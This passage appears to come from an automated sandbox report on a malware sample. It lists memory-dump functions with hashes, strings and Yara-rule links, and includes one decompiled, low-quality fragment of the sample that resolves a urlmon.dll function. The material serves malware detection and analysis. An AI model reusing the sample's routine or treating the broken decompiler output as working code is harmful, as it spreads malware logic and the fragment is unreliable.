                                                    Function 0156F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 5f7f6391773598196933041746750053ef010944ddbc64eb9690890a081e1b1c
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: 04517D71504712AFC320DF19C851A6BBBF8FF88750F00892EF9958B650E7B4E944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: c236ac73feebdf96aa5bd8dc0de9e6eaeea504af4f5eb41b691c484c220eeb15
                                                    • Instruction ID: f27c19e221ae374cc08b22b4f5319a5bdd31bbcfb1eb081cc9cd367b7f90971a
                                                    • Opcode Fuzzy Hash: c236ac73feebdf96aa5bd8dc0de9e6eaeea504af4f5eb41b691c484c220eeb15
                                                    • Instruction Fuzzy Hash: 664131B190052EABDB61DE50DC81FEEB77CBB44714F0045A5EA09BF240DB309E888FA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 016005AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: 6955146f27cff74f58a55c843b7be46b377c4529c7ea01e7ef7eb1ab85f02af2
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: BB3104326003566BE715DE28CC85F977BDAFBC4794F144229FA599B2C0D770E904C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: fcd7eb7f9ba58883c720bb7055dc541185285182caa1da8801916dc35efb506c
                                                    • Instruction ID: cb148aa8ba3867fe7d6e4684c0d85180c9e86d187d96efa90754e1c956c40837
                                                    • Opcode Fuzzy Hash: fcd7eb7f9ba58883c720bb7055dc541185285182caa1da8801916dc35efb506c
                                                    • Instruction Fuzzy Hash: B731E33290161ABFEB55DE59C985EAFBBB4FB80B20F024169E915BF250D730DE00C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 69f02f0c7ce56ddb1dfe723c7cdebf91b64eff7343a36f2f3c6cf2a8fa10b028
                                                    • Instruction ID: 31b0535021edaf9ac43e08b49a753735645211a71690f53b52f64cff87b38301
                                                    • Opcode Fuzzy Hash: 69f02f0c7ce56ddb1dfe723c7cdebf91b64eff7343a36f2f3c6cf2a8fa10b028
                                                    • Instruction Fuzzy Hash: D63147B16083069FC361DF68D98096FBBF8BBD9654F400A2EB9958B250D634DD05CBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01541B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 703cf87fd06aa8c9d6ad8bd4806b895f647a0a386e3cb6efffa509fe4e1f2524
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 9F210A36900519ABDF229A59CD80F5F7BADFF84654F054426FE048F200D630EC50CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0155F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: 9091f84ee21c0524aefb313d94072f074df8429052a6a493e72013548277bf75
                                                    • Instruction ID: b85d32815ba3fd71a9e20558865669fae3be31be7aa739086a7f66e1c15c7077
                                                    • Opcode Fuzzy Hash: 9091f84ee21c0524aefb313d94072f074df8429052a6a493e72013548277bf75
                                                    • Instruction Fuzzy Hash: DB11B2353646028BFBA54E1D84B073E76D6FB86624F24492BED62CF791EB70D8418380
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004172EA, Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 25%
                                                    			E004172EA(intOrPtr* __eax, void* __ecx) {
				intOrPtr* _t11;
				void* _t17;
				intOrPtr* _t23;
				void* _t27;
				void* _t28;

				if(__eax >= 0xb8) {
					_t28 = _t27 + 1;
					asm("clc");
					__eflags = __eax -  *__eax;
					 *__eax =  *__eax + __eax;
					E0041B7E0();
					_t2 = _t28 - 0x24; // 0x6d6c7275
					_t23 = E00414E20( *((intOrPtr*)(_t28 + 8)) + 0xc94, E0040ACD0(__eflags,  *((intOrPtr*)(_t28 + 8)) + 0xc94, _t2), 0, 0, 0x69767207);
					__eflags = _t23;
					if(_t23 == 0) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						_t11 =  *_t23(0, E0041BAB0(_t17) + _t17, _t28 - 4);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				} else {
					asm("in al, dx");
					asm("adc al, bh");
					return __eax;
				}
			}








                                                    0x004172ed
                                                    0x0041734f
                                                    0x00417350
                                                    0x00417351
                                                    0x00417353
                                                    0x00417355
                                                    0x0041735d
                                                    0x0041737d
                                                    0x00417382
                                                    0x00417384
                                                    0x004173a9
                                                    0x004173aa
                                                    0x004173b0
                                                    0x00417386
                                                    0x00417398
                                                    0x0041739a
                                                    0x0041739c
                                                    0x00000000
                                                    0x0041739e
                                                    0x004173a8
                                                    0x004173a8
                                                    0x0041739c
                                                    0x004172ef
                                                    0x004172ef
                                                    0x004172f0
                                                    0x004172fc
                                                    0x004172fc

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: urlmon.dll
                                                    • API String ID: 0-491099042
                                                    • Opcode ID: ab786cd3c7ff9e4ec0bf42834403328b72304841f68b2e4be4b3dbc944f5acf1
                                                    • Instruction ID: 6b20fbd0dae596621fa7140b236b8704a685853adbd0264f9944eccca13f9f91
                                                    • Opcode Fuzzy Hash: ab786cd3c7ff9e4ec0bf42834403328b72304841f68b2e4be4b3dbc944f5acf1
                                                    • Instruction Fuzzy Hash: C5F04C72E451192AD5215299AC02FFEB738CF86725F0402A7FD18F7241D50D9D8352ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Critical error detected %lx, xrefs: 015E8E21
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: 28a7af4ad75fb07f22b73d650e42653ea04e3b547a52345653e857ab4fdd08b2
                                                    • Instruction ID: 372e3f288d082cd4b8573606e82e70f3edb838abe1a27844e22c8daea31c4700
                                                    • Opcode Fuzzy Hash: 28a7af4ad75fb07f22b73d650e42653ea04e3b547a52345653e857ab4fdd08b2
                                                    • Instruction Fuzzy Hash: EE112376D14349DEDB29DFA88909B9CBBF0BB14714F24425EE569AF2C2D3740602CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 015CFF60
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: f1dac2e4c738c971684be23406b84ea69c40f5ed9c2c175b82f7f2e06d83e830
                                                    • Instruction ID: d85e8f2514d84b9635c7e3fe69b4a8335a9d60cdfabb10c912f439d4390eb15c
                                                    • Opcode Fuzzy Hash: f1dac2e4c738c971684be23406b84ea69c40f5ed9c2c175b82f7f2e06d83e830
                                                    • Instruction Fuzzy Hash: AD11ED71A10546EFDB26EF94CC48F9CBBB2FF48B14F148048E5086F2A1C7789980DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01605BA5, Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 296527306d5400f60e83bd5c3232376b0e57502552cffb1095efb27f7e6628c9
                                                    • Instruction ID: 82fff60c6f35639c5a88f6bb7470dfb28b49e1e773347de1d1e0556030882cab
                                                    • Opcode Fuzzy Hash: 296527306d5400f60e83bd5c3232376b0e57502552cffb1095efb27f7e6628c9
                                                    • Instruction Fuzzy Hash: 2D424B75900229CFDB29CF68CD80BAABBB1FF45304F1481AAD94DAB382D7749995CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01554120, Relevance: .4, Instructions: 444COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed09e4bace3715b505816865a500105d3910918415e4a41c529f350e66ad1eb2
                                                    • Instruction ID: feb286e6da1bc1ae261ad9822c330cc7f5cb9a334391bc9d6a2b7ef959338aa9
                                                    • Opcode Fuzzy Hash: ed09e4bace3715b505816865a500105d3910918415e4a41c529f350e66ad1eb2
                                                    • Instruction Fuzzy Hash: 20F17B706082528FCB64CF18C4A1A7ABBE1FF88754F15492EF98ACF251E734D881CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015620A0, Relevance: .4, Instructions: 420COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be04d0bb20bc6c3867fb82e70573f5bfc7237b67810be120d07f8fd91087a1c7
                                                    • Instruction ID: f53b63283ea6785d962d49d76087eba9201c2d558a4b5eb99821f657c6c97a40
                                                    • Opcode Fuzzy Hash: be04d0bb20bc6c3867fb82e70573f5bfc7237b67810be120d07f8fd91087a1c7
                                                    • Instruction Fuzzy Hash: 26F1C031A083429FE726CF2CC840B6E7BE9BF85764F04891DE9959F281E774D841CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0154D5E0, Relevance: .4, Instructions: 353COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4129943fa37cdc71073add53274483f3df8a845d56505b11de1569eb686f9071
                                                    • Instruction ID: 3d6fa3416bdfdbd664baf32133107a5fc7802f6dea9e43653e62cb051c60ea6d
                                                    • Opcode Fuzzy Hash: 4129943fa37cdc71073add53274483f3df8a845d56505b11de1569eb686f9071
                                                    • Instruction Fuzzy Hash: 48E1B030A0175ACFEB35CF68CC84BADB7B6BFA5308F044199D9099F291D734A981CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0154849B, Relevance: .3, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33dacdaeff52a3ad3ecb85661d6257a0eba8c12a8044bf78d2b8b74f9507150b
                                                    • Instruction ID: a09ae690992cf8d624173acac7f5f6362682fcac7636b979a8e50ea58f9d92f3
                                                    • Opcode Fuzzy Hash: 33dacdaeff52a3ad3ecb85661d6257a0eba8c12a8044bf78d2b8b74f9507150b
                                                    • Instruction Fuzzy Hash: 86B15970E0020ADFDB25DFE9C994AADBBF9BF98308F10452AE505AF245D774A941CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156513A, Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d55beb10a51a07fa478139e007bbe31ea1b37c2b0c7d7f908882866be82d3a5e
                                                    • Instruction ID: da17f9d7e98fd4878677f22a674caa90ba5e40325df3d271fe7436f4af16a1ae
                                                    • Opcode Fuzzy Hash: d55beb10a51a07fa478139e007bbe31ea1b37c2b0c7d7f908882866be82d3a5e
                                                    • Instruction Fuzzy Hash: 24C112755483818FD354CF28C580A5AFBF1BF88304F584A6EF9998B352D771E985CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015603E2, Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b369eae3ca0db647b5b6bbf1e2cb1b666f714dfa1b5e5eefec6403b6d0d057a
                                                    • Instruction ID: 3d579f6582b83bc82a1f6231e5539b38756b0c23e7f9472197751e4b3ebacc8e
                                                    • Opcode Fuzzy Hash: 4b369eae3ca0db647b5b6bbf1e2cb1b666f714dfa1b5e5eefec6403b6d0d057a
                                                    • Instruction Fuzzy Hash: F5911331E40616AFEB319AACCC44BAE7BE8BB44724F190261FA11AF2D1D7B49D40C7D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153C600, Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da6adead7007e3a3c1eaf96a14fb4ca74a977cc0d783592ef3ef008330b23ade
                                                    • Instruction ID: 9d56c822e55a6c6dc3576482974d406688672ac3d4828a2ea122c6bc6b11af40
                                                    • Opcode Fuzzy Hash: da6adead7007e3a3c1eaf96a14fb4ca74a977cc0d783592ef3ef008330b23ade
                                                    • Instruction Fuzzy Hash: DA8190756847069FDB26CE58C890A6F77E4FB88350F54482AEE459F241E332ED41CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015CB8D0, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f6beea53ddf24ae1e31cadeb35755688ab478da56e51e496879393d202da75d
                                                    • Instruction ID: fcc813a8862c8c4b8eb9680b09d138ab7068f4a9118884ea6c6ca033195dabc2
                                                    • Opcode Fuzzy Hash: 3f6beea53ddf24ae1e31cadeb35755688ab478da56e51e496879393d202da75d
                                                    • Instruction Fuzzy Hash: 3871E032240702AFE7318F98CC42F5ABBE5FB84BA5F14452CE6558F6A0DBB5E940CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B6DC9, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: 45d8045763d1b917759b228cd5acdecdf977e88acd61c4bc26c8d9757c7d5a51
                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: BA71617190061AEFDB10DFA5C984EEEBBB9FF88710F104469E505EB290E734AA41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015352A5, Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46eff53cfdc8456186251fe378ad9b84f4d4d3fe768a6ee5e786b8fdb88b73d8
                                                    • Instruction ID: da361ed92bd26599c5fadc83e72593e5db35295f6e09244faa573f4d29e24dc2
                                                    • Opcode Fuzzy Hash: 46eff53cfdc8456186251fe378ad9b84f4d4d3fe768a6ee5e786b8fdb88b73d8
                                                    • Instruction Fuzzy Hash: C351AA71205742ABD721DF68C841B2BBBE8FFA4714F14092AF4958B691E774E840CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01562AE4, Relevance: .2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e11a90ab79b9b792d74c20d1a177faf16c0f3cc69dc84143dd6464fad3183d0c
                                                    • Instruction ID: acbf145ba35c3b08adb86c2b0db568b352d7596fd067b7bb49a03c0a2839920e
                                                    • Opcode Fuzzy Hash: e11a90ab79b9b792d74c20d1a177faf16c0f3cc69dc84143dd6464fad3183d0c
                                                    • Instruction Fuzzy Hash: 11519176A00515CFCB24CF1CC8909BDB7F9FB88700B15895AE856AF365D734AA51CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015FAE44, Relevance: .2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 177aa2b02aa65f6e4467048154ff208a148d12eff148b2fba2a047ec2c617201
                                                    • Instruction ID: 867e1401946fdd4050012aa65148e4a8cd8cbb16e5421d6e1aa6f2aa29994c95
                                                    • Opcode Fuzzy Hash: 177aa2b02aa65f6e4467048154ff208a148d12eff148b2fba2a047ec2c617201
                                                    • Instruction Fuzzy Hash: 0241D6717006125BD7269E29C894B3FB79AFF94610F04861DFB2E8F2D0D734D801C692
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0155DBE9, Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 611b02c1e63ea5596c5c088f2061c0250af6428da150f61a30426803e5b34c90
                                                    • Instruction ID: c609955aa9a4923d8e96867121370c481048a400dead5dadea4069c7d12f6af2
                                                    • Opcode Fuzzy Hash: 611b02c1e63ea5596c5c088f2061c0250af6428da150f61a30426803e5b34c90
                                                    • Instruction Fuzzy Hash: 7E51B372A00616DFCB65CFACC8A069EFBF5BF88350F20855AD955AF344DB70A944CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0154EF40, Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: c0fdc2ba406ceb4748ac69981da2c9b685a3463daac77b275cf9b106854acced
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: C3510730E04245EFEB25CB6CC1C57AEBBF1FF45318F1481A9C55A5B282C379A989C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0160740D, Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: c2279a983d7476a6015200207a6cd79740ef5b62a8cfb89c8d2fe8ec2e67b905
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: C751B071500646DFDB1BCF58D880A92BBF5FF44304F15C0AAE9089F252E772E946CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01562990, Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2eefa39c2b22fdead55bae84b53d6a627d8962ef25546837697457af9c8bc5a
                                                    • Instruction ID: 79f2766ec4568cbcba32c824ec7bb14f5b7c006c478b27dcd795100390a1c5ad
                                                    • Opcode Fuzzy Hash: a2eefa39c2b22fdead55bae84b53d6a627d8962ef25546837697457af9c8bc5a
                                                    • Instruction Fuzzy Hash: B5516A71A0020ADFDF25DF59C880AEEBBB9BF88310F048155E904AF260D3B59992CFD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01564BAD, Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a381ae05735f6838bfcd2d502943b04fe5ee5363d69661dadc7971dcae8a6e9b
                                                    • Instruction ID: 4ec22519b11d2af6978cf1a2e8a9d681638443fe025330c157e299fa0ac50d1c
                                                    • Opcode Fuzzy Hash: a381ae05735f6838bfcd2d502943b04fe5ee5363d69661dadc7971dcae8a6e9b
                                                    • Instruction Fuzzy Hash: 85419335A402299BDB21DF68C940BEE7BF8BF45700F4504A6E908AF341DB74DE85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01564D3B, Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c70a45038269cfe36042ccdb3058634f6232ef433ce374e30c92cce0a70986d2
                                                    • Instruction ID: 2d84d8bb660be1d5e954f23e02651a355cee394bfb42ad6f1e318257ccba7590
                                                    • Opcode Fuzzy Hash: c70a45038269cfe36042ccdb3058634f6232ef433ce374e30c92cce0a70986d2
                                                    • Instruction Fuzzy Hash: FF41E471A403199FEB32DF18DC81FAABBA9FB55610F04409AE9459F281D774DD40CBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015FAA16, Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction ID: 7b179daf7b6b67214b0e06ad820f6f38f8dabd7c18bf7676b3b12ff16b9e0400
                                                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction Fuzzy Hash: 8231C332B0010A6BEB168B69C845BAFFBBBFFC4210F05846DEA09AB251DA74DD04C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01548A0A, Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91df153dc94ea01a747ae4aa8436d122ab6377a62689e31f3dde6e454fae15ed
                                                    • Instruction ID: 9373e2dac177151252e32b24532cf2fe1751fbbd7e48c9ce06ac194e344507ec
                                                    • Opcode Fuzzy Hash: 91df153dc94ea01a747ae4aa8436d122ab6377a62689e31f3dde6e454fae15ed
                                                    • Instruction Fuzzy Hash: 494175B4A4022D9FDB24DF5ACC88AADB7F4FB94314F1045E9D9199B242E7B09E84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015FFDE2, Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction ID: d2c03f990f9ad0d79da283a251b2b17b2c2a415935a2d043fb3cc2c26fc051ac
                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction Fuzzy Hash: EE31D033200641AFD7269B68C844F6ABBEAFFC5A50F18445EEB568FB42DA74DC41C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015FEA55, Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
